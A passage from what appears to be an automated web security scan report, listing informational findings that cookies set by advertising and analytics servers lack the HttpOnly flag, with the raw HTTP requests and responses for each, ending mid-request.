document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...
14.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A10&ranreq=0.35609531262889504&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; PUBMDCID=1; pubfreq_26621_21557_1797109372=921-1; KTPCACOOKIE=YES; __qca=P0-585104895-1317606788364

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:07 GMT
Content-Length: 1550
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:07 GMT; path=/
Set-Cookie: pubfreq_26621_21556_427351122=207-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:07 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
14.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=008EB7&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A52%3A57&ranreq=0.7452815969008952&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x47&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:54 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621=; domain=pubmatic.com; expires=Wed, 05-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubtime_26621=TMC; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1687682837=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:54 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:54 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA1VAAAAAA
...[SNIP]...
14.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...
14.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=6&prevkadIds=21556_21556&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621&kltstamp=2011-9-2%2020%3A53%3A13&ranreq=0.44594317954033613&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:; pubfreq_26621_21557_1797109372=921-1; __qca=P0-585104895-1317606788364; pubfreq_26621_21556_427351122=207-1; PUBMDCID=1; pubfreq_26621_21556_1914588461=6-1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 1392
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:09 GMT; path=/
Set-Cookie: pubfreq_26621_21556_126284783=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:09 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame32662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
14.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21557&kadwidth=728&kadheight=90&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A3&ranreq=0.2315859266091138&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621_21556_1478501671=559-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:53:00 GMT
Content-Length: 1389
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:53:00 GMT; path=/
Set-Cookie: pubfreq_26621_21557_1797109372=921-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:33:00 GMT; path=/

document.write('<div id="http_ads_pubmatic_comHostedDefaultTags266202662121557559adtag_htmlkomli_ads_frame12662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top:
...[SNIP]...
14.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A24&ranreq=0.780912266112864&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3; PUBMDCID=1; _curtime=1317600804; camfreq_126550188=3663-1_1317687204; pubfreq_26072_21043_618709548=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1905
Date: Mon, 03 Oct 2011 00:14:52 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:52 GMT; path=/
Set-Cookie: _curtime=1317600892; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:52 GMT; path=/
Set-Cookie: camfreq_1175871307=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:52 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:52 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
14.212. http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif?&dcsdat=1317599885976&dcssip=www.barclayswealth.com&dcsuri=/international/foreign-exchange-affiliates.htm&dcsqry=%3FWT.mc_ID=DISP_Premiership_080711&dcsref=http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1317599886010&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=18&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Your%20passport%20to%20the%20world%20of%20foreign%20currency%20-%20Banking%20and%20Cards%20-%20International%20-%20Barclays%20Wealth&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.barclayswealth.com/international/foreign-exchange-affiliates.htm&WT.sp=wealthitnl&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAfAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOFQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:58:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAgAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAAJtOZk46TmZONacAAEljZk5JY2ZOAskAADd8Z043fGdOgMUAAEF9Z05AfWdOm/IAAAEYaE7ZD2hOnfIAAHfqiE5o6ohOc/sAAGQSaE5fEmhO990AALcwbk6qMG5OZuUAAGiicE4YoXBOoZ4AAOqhcE4yoXBOk+8AAH2hcE59oXBOD6gAAJ3ccU5B23FOI8sAAGbbcU5P23FODqgAAJLfcU4t33FOJNoAAFJIc05SSHNOutAAAIcNhU6HDYVOyBEBABXEhU4VxIVOSaEAAAQFh04EBYdOtuwAAJb6iE6R+ohOFgAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAACbTmZOOk5mTkRCAABJY2ZOSWNmTmVJAABBfWdON3xnTq1OAAB36ohOaOqITtUiAAC3MG5OqjBuTjFMAABoonBOGKFwTtc/AADqoXBOMqFwTsJBAACS33FOQdtxThpKAABm23FOT9txTmRMAABSSHNOUkhzTnpLAACHDYVOhw2FToxNAAAVxIVOFcSFTq49AAAEBYdOBAWHTs5OAACW+ohOkfqITgAAAAA-; path=/; expires=Wed, 29-Sep-2021 23:58:14 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
14.213. http://tag.admeld.com/id  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /id

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /id?redirect=http://cas.criteo.com/delivery/admeld_map?match=[admeld_user_id] HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
